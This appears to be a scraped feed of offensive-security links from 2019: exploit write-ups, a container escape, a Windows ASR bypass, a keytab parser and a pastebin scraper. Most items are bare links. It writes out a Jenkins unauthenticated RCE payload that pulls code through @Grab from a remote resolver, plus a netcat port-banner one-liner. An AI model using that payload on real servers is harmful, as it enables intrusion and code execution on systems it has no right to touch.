Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
Gist
Parses Kerberos Keytab files
Parses Kerberos Keytab files. GitHub Gist: instantly share code, notes, and snippets.
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver
http://www.jackson-t.ca/lg-driver-lpe.html
http://www.jackson-t.ca/lg-driver-lpe.html
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
Orange
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
This is 🍊 speaking
Jenkins Unauth RCE
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
blog.dragonsector.pl
CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
Introduction The inspiration to the following research was a CTF task called namespaces by _tsuro from the 35C3 CTF . While solvin...
Bypass Windows Exploit Guard ASR
https://github.com/sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019
https://github.com/sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019
GitHub
GitHub - sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019: Public documents related to my talk "Bypass Windows Exploit Guard…
Public documents related to my talk "Bypass Windows Exploit Guard ASR" at Offensive Con 2019. - sevagas/WindowsDefender_ASR_Bypass-OffensiveCon2019
No nmap? No problem! Grab banners from local IPv4 listening ports.
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
Web Cache Deception Attack leads to user info disclosure
https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29
https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29
Medium
Web Cache Deception Attack leads to user info disclosure
Hello Everyone
[Remote Exec | Persistence] - Hunting for remote windows service creation
https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
pastebin_scraper
https://github.com/Critical-Start/pastebin_scraper
Automated tool to monitor pastebin for interesting information
https://github.com/Critical-Start/pastebin_scraper
Automated tool to monitor pastebin for interesting information